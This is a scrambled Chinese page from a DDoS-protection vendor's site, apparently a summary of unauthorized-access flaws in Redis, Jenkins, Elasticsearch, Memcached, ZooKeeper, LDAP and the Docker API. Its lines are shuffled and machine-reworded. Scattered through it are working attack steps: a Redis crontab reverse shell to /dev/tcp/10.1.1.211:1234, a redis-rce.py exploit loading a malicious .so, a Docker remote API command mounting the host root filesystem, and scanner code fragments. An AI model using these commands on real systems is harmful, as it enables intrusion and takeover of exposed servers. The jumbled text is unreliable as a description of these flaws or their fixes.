聊聊常见未授权DDoS防御访咨询漏洞总结-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 聊聊常见未授权DDoS防御访咨询漏洞总结

聊聊常见未授权DDoS防御访咨询漏洞总结

小墨安全管家 2020-07-24 12:15 CC防护 89 ℃
DDoS防御

    try: 

    except Exception, e: 

config get dir 

连接 Redis 写入文件 

漏洞缘由:未配置账号密码认证,导致未授权访咨询。

cd redis-rce/ 

        conn.closed 

:9200/_cat/indices 

MenCache未授权访咨询

2、攻击端执行:python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

http.basic.ipwhitelist ["localhost""127.0.0.1"

3、访咨询1.txt文件

漏洞缘由:

        #pass 

# _*_  coding:utf-8 _*_ 

echo envi|nc 192.168.15.74 2181 

1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。

修复建议:

    print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port) 

2、写入1.txt文件

save 

修复建议:增加用户密码权限验证,设置本地监听或者访咨询操纵。

2、Jenkins 未授权访咨询

姿势三:利用contrab打算任务反弹shell

    except

5、Elasticsearch未授权访咨询

漏洞利用:

    url = ""+ip+":"+str(port)+"/_cat" 

make 

sudo docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash 

def ldap_anonymous(ip): 

漏洞缘由:Memcached 分布式缓存系统,默认的 11211 端口不需要密码即可访咨询,黑客直截了当访咨询即可猎取数据库中所有信息,造成严峻的信息泄露。

set test "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.211:1234 0>&1" 

 

聊聊常见未授权DDoS谨防拜访漏洞总结


DDoS防御

当前位置:主页 > CC防护 > 聊聊常见未授权DDoS防御访咨询漏洞总结

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119